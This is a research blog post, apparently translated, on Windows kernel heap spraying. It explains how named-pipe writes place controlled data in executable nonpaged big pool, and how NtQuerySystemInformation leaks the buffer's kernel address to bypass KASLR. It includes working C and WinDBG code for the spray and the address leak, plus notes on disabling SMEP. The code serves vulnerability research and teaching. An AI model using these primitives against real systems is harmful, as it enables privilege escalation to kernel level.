Year of the Goat Kernel Heap Feng Shui: Heap Spraying in the "Big Kids' Pool"
0x01 The State of Kernel Exploitation
A typical write-what-where kernel exploit (writing arbitrary data to an arbitrary address) usually relies on one of two methods. One is to modify a key kernel-mode data structure, which is easy to do locally because Kernel Address Space Layout Randomization (KASLR) on Windows is weak. The other is to redirect execution to a controlled user-mode address, whose code then runs with ring 0 privileges.
The second method is the easier one: there is no need to worry about the kernel address space, and the attacker has full control of the code within a process. Common vectors include modifying the tagWND structure or the HAL Dispatch Table.
However, with Supervisor Mode Execution Prevention (SMEP), also known as Intel OS Guard, this technique is no longer reliable: a user-mode address can no longer be used directly. Other reliable techniques are therefore needed.
One alternative is to disable SMEP enforcement by clearing the corresponding bit in the CR4 register through Return-Oriented Programming (ROP). This requires control of the stack, and it has been covered in a few papers and presentations.
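To make the "bit in the CR4 register" concrete, here is a minimal sketch of the arithmetic only. It relies on the Intel SDM placing SMEP at bit 20 of CR4; the helper names and the sample register value are hypothetical, and the code merely computes values (reading or writing CR4 itself needs ring 0 and is not shown).

```c
#include <stdint.h>

/* CR4.SMEP is bit 20 according to the Intel SDM. */
#define CR4_SMEP_BIT  20u
#define CR4_SMEP_MASK ((uint64_t)1 << CR4_SMEP_BIT)

/* Returns nonzero if the given CR4 value has SMEP enforcement enabled. */
static inline int cr4_smep_enabled(uint64_t cr4)
{
    return (cr4 & CR4_SMEP_MASK) != 0;
}

/* Returns the CR4 value a ROP chain would have to load to turn SMEP off. */
static inline uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~CR4_SMEP_MASK;
}
```

For an illustrative CR4 value of 0x1506f8, cr4_smep_enabled() reports that SMEP is on, and cr4_without_smep() yields 0x506f8.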
Another alternative is to disable SMEP on a per-page basis, by changing the page-level translation mapping entries so that a user-mode page is marked as a kernel page. This has been discussed in at least one presentation and, if accepted, a friend of mine will present it at SyScan 2015. Additionally, if accepted, a different version of the technique will be presented at INFILTRATE 2015.
Finally, one alternative is feasible in theory: transfer execution (through a pointer or a callback table) to an existing function that disables SMEP (bypassing KASLR along the way) and then somehow hands control back to the attacker without ROP. Nobody has found such a function so far. This would be a form of Jump-Oriented Programming (JOP).
All of these techniques still use a user-mode address to carry the main payload (which is not a problem in itself). But should we not also consider using a kernel-mode address for the attack? With the payload in kernel memory, there is no need to disable SMEP through ROP or by tampering with page table entries (PTEs) in the first place.
Obviously, this requires that the function doing the payload's work already exists in kernel space, or that we have a way to bring it into the kernel. In a stack or pool overflow, for example, the payload usually arrives with the attack itself, and the usual challenge is getting code execution to reach it. Such attacks are especially common in "remote-remote" scenarios.
But what about write-what-where vulnerabilities, the favorite of local (or remote-local) attackers? If we already have user-mode code execution to trigger the write-what-where, we can obviously keep using it to fill an address of our choice with payload data, one write at a time. This raises a few problems, however:
1) The write-what-where may be unreliable, or may corrupt adjacent data, which makes it hard to use for filling memory with code.
2) It may not be obvious where to write the code, given KASLR and kernel NX. On Windows this is not terribly hard to solve, but it is still a barrier.
This post introduces what I believe to be two new techniques: a generic kernel-mode heap spraying technique (which yields executable kernel memory), and a generic technique for discovering kernel-mode heap addresses, bypassing KASLR.
0x02 Big Pool
Experts on the Windows heap manager (called the "pool") know that there are two different allocators (three, if you are being pedantic): the regular pool allocator (which can use lookaside lists that behave slightly differently from regular pool allocations), and the big pool (large page) allocator.
The regular pool serves allocations that fit within a page: up to 4080 bytes on x86 (8 bytes go to the pool header and 8 bytes to the initial free block), or up to 4064 bytes on x64 (16 bytes for the pool header and 16 bytes for the initial free block). Tracking, mapping, and accounting for these allocations are handled by the pool manager's regular machinery, and the pool headers link everything together.
Big pool allocations, on the other hand, take up one or more whole pages. They are used for anything above the sizes just mentioned, and also whenever cache-aligned pool memory is requested, regardless of the requested size, because cache alignment cannot easily be guaranteed without dedicating at least one whole page to the allocation.
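The choice between the two allocators comes down to simple arithmetic, sketched below. The function names are hypothetical, and treating 4080 and 4064 bytes as inclusive maximums is my reading of the figures above rather than something taken from the pool manager's code.

```c
#include <stdbool.h>
#include <stddef.h>

#define PAGE_SIZE 4096u

/* Largest request the regular pool can serve: one page minus the pool
 * header and minus the initial free block (8 + 8 on x86, 16 + 16 on x64). */
static inline size_t max_regular_pool_request(bool is_x64)
{
    size_t pool_header = is_x64 ? 16 : 8;
    size_t initial_free_block = is_x64 ? 16 : 8;
    return PAGE_SIZE - pool_header - initial_free_block;
}

/* True when a request would be served by the big pool allocator:
 * either it is too large, or cache-aligned memory was requested. */
static inline bool uses_big_pool(size_t request, bool is_x64, bool cache_aligned)
{
    return cache_aligned || request > max_regular_pool_request(is_x64);
}
```

Under these assumptions a 4080-byte request on x86 stays in the regular pool, a 4081-byte request goes to the big pool, and a cache-aligned request goes to the big pool whatever its size.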
Because there is no room for a header, these pages are tracked in a separate "big pool tracking table" (nt!PoolBigPageTable). The pool tag that identifies the owner of an allocation is likewise stored in that table rather than in a header (since there is none). Each entry in the table is a POOL_TRACKER_BIG_PAGES structure, which is described in the public symbols:
    lkd> dt nt!_POOL_TRACKER_BIG_PAGES
       +0x000 Va               : Ptr32 Void
       +0x004 Key              : Uint4B
       +0x008 PoolType         : Uint4B
       +0x00c NumberOfBytes    : Uint4B
Note that the virtual address (Va) is OR'ed with a bit that indicates whether the allocation is freed or still allocated. In other words, the table may contain several entries with the same Va: any number of them freed, but at most one allocated. The following WinDBG script dumps all current big pool allocations:
    r? @$t0 = (nt!_POOL_TRACKER_BIG_PAGES*)@@(poi(nt!PoolBigPageTable))
    r? @$t1 = *(int*)@@(nt!PoolBigPageTableSize) / sizeof(nt!_POOL_TRACKER_BIG_PAGES)
    .for (r @$t2 = 0; @$t2 < @$t1; r? @$t2 = @$t2 + 1)
    {
        r? @$t3 = @$t0[@$t2];
        .if (@@(@$t3.Va != 1))
        {
            .printf "VA: 0x%p Size: 0x%lx Tag: %c%c%c%c Freed: %d Paged: %d CacheAligned: %d\n", @@((int)@$t3.Va & ~1), @@(@$t3.NumberOfBytes), @@(@$t3.Key >> 0 & 0xFF), @@(@$t3.Key >> 8 & 0xFF), @@(@$t3.Key >> 16 & 0xFF), @@(@$t3.Key >> 24 & 0xFF), @@((int)@$t3.Va & 1), @@(@$t3.PoolType & 1), @@(@$t3.PoolType & 4) == 4
        }
    }
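The bit manipulation the script performs on each entry can also be written out in plain C. This is only a sketch for the 32-bit layout shown above: the struct and function names are hypothetical, and it works on values you pass in rather than on live kernel memory.

```c
#include <stdint.h>

/* Decoded view of one tracker entry (hypothetical helper type). */
typedef struct {
    uint32_t va;      /* allocation address with the flag bit cleared */
    int      freed;   /* 1 if bit 0 of Va was set, as the script prints it */
    char     tag[5];  /* four tag characters plus a terminating NUL */
} big_page_info;

/* Splits the raw Va and Key fields the same way the WinDBG script does. */
static inline big_page_info decode_tracker(uint32_t raw_va, uint32_t key)
{
    big_page_info info;
    info.va = raw_va & ~(uint32_t)1;   /* same as (Va & ~1) in the script */
    info.freed = (int)(raw_va & 1);    /* same as (Va & 1) in the script */
    for (int i = 0; i < 4; i++) {
        /* Tag characters are stored low byte first: Key >> 0, 8, 16, 24. */
        info.tag[i] = (char)((key >> (8 * i)) & 0xFF);
    }
    info.tag[4] = '\0';
    return info;
}
```

With made-up inputs raw_va = 0x85e03001 and key = 0x7246704E, this gives va = 0x85e03000, freed = 1, and the tag "NpFr".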
Why are big pool allocations so interesting? Unlike small pool allocations, which can share pages and are hard to track when debugging (short of dumping the entire pool), big pool allocations are easy to enumerate. How easy? The undocumented, KASLR-defeating API NtQuerySystemInformation has an information class specifically for dumping big pool allocations. It returns not only their size, tag, and type (paged or nonpaged), but also their kernel-mode virtual address!
As presented previously, this API requires no privileges. Only in Windows 8.1 was it locked down, and only against low-integrity callers (such as Metro and sandboxed applications).
The following snippet enumerates all big pool allocations:
    //
    // Note: This is poor programming (hardcoding 4MB).
    // The correct way would be to issue the system call
    // twice, and use the resultLength of the first call
    // to dynamically size the buffer to the correct size
    //
    bigPoolInfo = RtlAllocateHeap(RtlGetProcessHeap(), 0, 4 * 1024 * 1024);
    if (bigPoolInfo == NULL) goto Cleanup;

    res = NtQuerySystemInformation(SystemBigPoolInformation,
                                   bigPoolInfo,
                                   4 * 1024 * 1024,
                                   &resultLength);
    if (!NT_SUCCESS(res)) goto Cleanup;

    printf("TYPE ADDRESS\tBYTES\tTAG\n");
    for (i = 0; i < bigPoolInfo->Count; i++)
    {
        printf("%s0x%p\t0x%lx\t%c%c%c%c\n",
               bigPoolInfo->AllocatedInfo[i].NonPaged == 1 ? "Nonpaged " : "Paged ",
               bigPoolInfo->AllocatedInfo[i].VirtualAddress,
               bigPoolInfo->AllocatedInfo[i].SizeInBytes,
               bigPoolInfo->AllocatedInfo[i].Tag[0],
               bigPoolInfo->AllocatedInfo[i].Tag[1],
               bigPoolInfo->AllocatedInfo[i].Tag[2],
               bigPoolInfo->AllocatedInfo[i].Tag[3]);
    }

    Cleanup:
    if (bigPoolInfo != NULL)
    {
        RtlFreeHeap(RtlGetProcessHeap(), 0, bigPoolInfo);
    }
0x03 Pool Control
Obviously, having all these kernel-mode addresses is very useful, but reading addresses is not enough. How can we also control the data they point to? You may be aware of earlier techniques in which a user-mode attacker allocates a kernel object (an APC reserve object, for example) that has a few user-controlled fields and an API that reveals its kernel-mode address. We are essentially going to do the same here, but with control over more than just a few fields. Our goal is to find a user-mode API that gives us full control over the kernel-mode data of an object, and that also results in a big pool allocation.
This is not as hard as it sounds. Whenever a kernel-mode component allocates more than the limits described in 0x02 (more than a page, that is, about 4 KB), a big pool allocation is made. The problem therefore reduces to finding a user-mode API that causes a kernel allocation of more than 4 KB whose data we control. And because Windows XP SP2 and later enforce non-executable kernel memory, the allocation must also land in executable memory to suit our needs.
(In other words, the API must meet three conditions: it triggers a big pool allocation, the data is controllable, and the allocated memory is executable.)
Two easy examples may immediately come to mind:
1) Create a local socket and listen on it, connect to it from another thread, and then issue a write of more than 4 KB of data without reading it. This causes the Ancillary Function Driver for WinSock (AFD.SYS), affectionately known as "Another F*cking Driver", to allocate the socket data in kernel-mode memory. Because the Windows network stack runs at DISPATCH_LEVEL (IRQL 2), where paging is not available, AFD uses a nonpaged pool buffer for the allocation. This is great for us, because before Windows 8, nonpaged pool is executable!
2) Create a named pipe and issue a write of more than 4 KB of data without reading it. This causes the Named Pipe File System (NPFS.SYS) to allocate the pipe data in a nonpaged pool buffer as well (for the same reason: NPFS performs its buffer management at DISPATCH_LEVEL).
Ultimately, the second method is much simpler: it takes only a few lines of code, and pipe operations are less conspicuous than socket operations. The important thing to know is that NPFS prefixes our buffer with its own internal header, called a DATA_ENTRY. The size of this header differs slightly between NPFS versions (XP and earlier, 2003, and Windows 8 and later).
I have found that the cleanest way to handle this is to account for the header inside the user-mode buffer, with the right offsets, so that the final kernel payload does not have to care about it. And remember that the key is to write a buffer of at least one page, so that the big pool allocator is used.
Here is a small snippet that takes all of this into account and has the desired effect:
    UCHAR payLoad[PAGE_SIZE - 0x1C + 44];

    //
    // Fill the first page with 0x41414141, and the next page
    // with INT3's (simulating our payload). On x86 Windows 7
    // the size of a DATA_ENTRY is 28 bytes (0x1C).
    //
    RtlFillMemory(payLoad, PAGE_SIZE - 0x1C, 0x41);
    RtlFillMemory(payLoad + PAGE_SIZE - 0x1C, 44, 0xCC);

    //
    // Write the data into the kernel
    //
    res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payLoad));
    if (res == FALSE) goto Cleanup;
    res = WriteFile(writePipe, payLoad, sizeof(payLoad), &resultLength, NULL);
    if (res == FALSE) goto Cleanup;

    //
    // extra code goes here...
    //

    Cleanup:
    CloseHandle(writePipe);
    CloseHandle(readPipe);
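The offsets hard-coded in the snippet above follow from a little arithmetic, which the sketch below spells out. The struct and function names are hypothetical; the only inputs are the DATA_ENTRY size (0x1C on x86 Windows 7, per the comment above) and the payload length, and the sketch assumes the header is smaller than a page.

```c
#include <stddef.h>

#define PAGE_SIZE 4096u

/* Sizes and offsets for one sprayed buffer (hypothetical helper type). */
typedef struct {
    size_t padding_len;      /* filler bytes placed before the payload */
    size_t user_buf_len;     /* total bytes written into the pipe */
    size_t kernel_alloc_len; /* DATA_ENTRY header plus the user buffer */
    size_t payload_offset;   /* payload offset from the start of the kernel allocation */
} spray_layout;

/* Pads the user buffer so that header + padding fill exactly one page,
 * which puts the payload at offset PAGE_SIZE in the kernel allocation.
 * Assumes data_entry_size < PAGE_SIZE. */
static inline spray_layout plan_spray(size_t data_entry_size, size_t payload_len)
{
    spray_layout layout;
    layout.padding_len = PAGE_SIZE - data_entry_size;
    layout.user_buf_len = layout.padding_len + payload_len;
    layout.kernel_alloc_len = data_entry_size + layout.user_buf_len;
    layout.payload_offset = data_entry_size + layout.padding_len;
    return layout;
}
```

For plan_spray(0x1C, 44) this gives a 4112-byte user buffer (matching PAGE_SIZE - 0x1C + 44), a 4140-byte kernel allocation, and a payload that starts exactly one page (4096 bytes) into it. A different NPFS version only changes the first argument.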
Now all we need to know is that NPFS uses the pool tag "NpFr" for its read data buffers (you can find this out with the !pool and !poolfind commands in WinDBG). We can then change the earlier KASLR-defeating snippet to hard-code this tag and the expected allocation size, and instantly find the kernel-mode virtual address of the buffer that holds our payload.
Keep in mind that the "paged vs. nonpaged" flag is OR'ed into the virtual address (this differs from the kernel's own structure described earlier, where the bit tracks freed vs. allocated), so we need to mask it out. We also need to round the size up to the pool header alignment (it is enforced even for big pool allocations). Here is the snippet that locates the NpFr allocation, for x86 Windows:
    //
    // Based on pooltag.txt, we're looking for the following:
    // NpFr - npfs.sys - DATA_ENTRY records (r/w buffers)
    //
    for (entry = bigPoolInfo->AllocatedInfo;
         entry < bigPoolInfo->AllocatedInfo + bigPoolInfo->Count;
         entry++)
    {
        if ((entry->NonPaged == 1) &&
            (entry->TagUlong == 'rFpN') &&
            (entry->SizeInBytes == ALIGN_UP(PAGE_SIZE + 44, ULONGLONG)))
        {
            //
            // Mask out the nonpaged flag first, then add the page
            // offset ('+' binds tighter than '&' in C)
            //
            printf("Kernel payload @ 0x%p\n",
                   (PVOID)(((ULONG_PTR)entry->VirtualAddress & ~(ULONG_PTR)1) + PAGE_SIZE));
            break;
        }
    }
And here is the proof in WinDBG: [screenshot]
Voila! Package this into a simple "kmalloc" helper function, and you too can allocate executable kernel-mode memory at a known address. How big can these allocations get? In my experiments, allocations in the megabyte range were no problem at all, but since this is nonpaged pool, make sure you have enough RAM to back it. Sample code implementing exactly this helper was linked here (no link).
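The lookup step of such a helper can be sketched in portable C so that the matching logic is easy to follow and test. This is not the real SYSTEM_BIGPOOL_ENTRY: the bigpool_entry struct, the function names, and the 8-byte x86 alignment constant are assumptions made for illustration, and the entries are supplied by the caller instead of coming from NtQuerySystemInformation.

```c
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE  4096u
#define POOL_ALIGN 8u          /* assumed x86 pool alignment (ULONGLONG) */
#define NPFR_TAG   0x7246704Eu /* bytes 'N','p','F','r' in memory order */

/* Simplified stand-in for one big pool entry on x86 (hypothetical layout). */
typedef struct {
    uint32_t va_and_flag;   /* virtual address with bit 0 = nonpaged flag */
    uint32_t size_in_bytes;
    uint32_t tag;
} bigpool_entry;

/* Rounds value up to a multiple of align (align must be a power of two). */
static inline uint32_t align_up(uint32_t value, uint32_t align)
{
    return (value + align - 1) & ~(align - 1);
}

/* Returns the kernel address of the payload, or 0 if no entry matches. */
static inline uint32_t find_payload(const bigpool_entry *entries, size_t count,
                                    uint32_t tag, uint32_t payload_len)
{
    uint32_t wanted_size = align_up(PAGE_SIZE + payload_len, POOL_ALIGN);
    for (size_t i = 0; i < count; i++) {
        if ((entries[i].va_and_flag & 1) &&           /* nonpaged only */
            entries[i].tag == tag &&
            entries[i].size_in_bytes == wanted_size) {
            /* Clear the flag bit before adding the one-page offset. */
            return (entries[i].va_and_flag & ~(uint32_t)1) + PAGE_SIZE;
        }
    }
    return 0;
}
```

With a made-up nonpaged entry at 0x85e03000 (stored as 0x85e03001), tag NPFR_TAG, and size 4144, find_payload(entries, count, NPFR_TAG, 44) returns 0x85e04000. Note the parentheses around the mask: without them, `+` would be applied before `&`.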
As an added bonus, you can get not only the virtual address of the allocation, but its physical address as well! Through one of the Superfetch APIs, which I first discovered and used in my meminfo tool, the memory manager will happily return the pool tag, virtual address, and physical address of our allocation.
Here is RAMMap showing the virtual and physical addresses of another payload allocation [screenshot]. Note the 0x1000 difference: the command-line PoC biases the pointer by one page, as in the snippet above, which adds PAGE_SIZE.
0x04 Conclusion
Now, for full disclosure, there are a few additional caveats that make this technique a bit less sexy in 2015, and that explain why I chose to talk about it today rather than eight years ago, when I first stumbled upon it:
1) Starting with Windows 8, nonpaged pool allocations are no longer executable. The technique in this post can still spray the pool, but executing the code first requires some bypass of the no-execute (NX) protection. In other words, the problem of bypassing SMEP has merely turned into the problem of bypassing kernel-mode NX.
2) In Windows 8.1, the API that returns the big pool entries and their addresses can no longer be used by low-integrity callers. This greatly reduces its usefulness in local-remote attacks, since those are usually launched from sandboxed applications (Flash, IE, Chrome, and so on) or Metro containers.
Of course, there are ways around these problems. A sandbox escape is often part of a local-remote attack anyway, so problem 2) can become moot. As for problem 1), some astute researchers have already pointed out that NX is not deployed everywhere: session pool allocations, for example, are still executable on newer versions of Windows, though only on x86 (32-bit) systems. Extending the technique to take advantage of this is left as an exercise for the reader (hint: there is a "Big Session Pool").
But what about a modern 64-bit version of Windows, or even Windows 10? The technique described here appears to be dead on such systems. Or is it? Is everything in the kernel truly NX, or are there still ways to allocate executable memory and learn its address? I will be sure to answer these questions on my blog as soon as Windows 14 is released.